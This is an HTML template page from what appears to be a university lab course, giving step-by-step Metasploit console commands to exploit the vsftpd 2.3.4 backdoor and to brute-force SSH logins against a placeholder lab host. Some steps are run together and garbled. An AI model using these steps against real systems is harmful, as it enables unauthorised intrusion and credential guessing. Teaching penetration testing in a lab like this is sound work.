{% extends "base.html" %}
{% block title %}SRIE > TP4 - Gaining access > Metasploit{% endblock %}
{% block content %}
<div class="container p-5 my-5">
    <h2 class="text-center"> TP4 - Gaining access > Metasploit</h2>
    <div class="container p-5 mt-1 mb-3">
        <p class="lead">
            Matasploit is a framework that lots of cybercriminals use. As it is an open-source one, it can
            be easily customized to response your own need.
        </p>
    </div>

    <hr>
    <!-- Installation section -->
    <h3 class="text-center">VSFTPD</h3>

    <div class="container p-5 mt-1 mb-3">
        <p class="lead">The metasploit framework allows you to exploit some vulnerabilities. You can for example exploit
            the VSFTPD backdoor. Follow these steps in order to exploit that backdoor :
            <br><br>
            1- Search vsftpd
            <br>
            2- use exploit/unix/ftp/vsftpd_234_backdoor
            <br>
            3- show options
            <br>
            4- set RHOSTS IP_VISMIN
            <br>
            5- exploit
            <br>

        </p>

    </div>
    <hr>

    <h3 class="text-center">SSH</h3>
    <div class="container p-5 mt-1 mb-3">
        <p class="lead">This tool also allows you to exploit SSH. Please follow the following steps.
            <br><br>
            1- Search ssh-login
            <br>
            2- use auxiliary/scanner/ssh/ssh_login
            <br>
            3- setg rhosts IP_VISMIN
            <br>
            4- set USER_FILE /home/kali/FTP_hack/usernames.txtset RHOSTS IP_VISMIN
            <br>
            5- set PASS_FILE /home/kali/FTP_hack/ passwords.txtexploit
            <br>
            6- Exploit
            <br>


        </p>

    </div>
    <hr>
    <h3 class="text-center">And much more</h3>
    <div class="container p-5 mt-1 mb-3">
        <p class="lead">This framework enables you to exploit much more backdoors. We have seen how to perform
            NetBIOS-SSN, JAVA-RMI, PostgreSQL, TOMCAT attacks using this framework. This page serves as a guide to
            introduce you to the Metasploit framework. All the attacks I have quoted can be performed in the same way as
            the previous ones.
        </p>

    </div>
    <hr>
</div>
{% endblock %}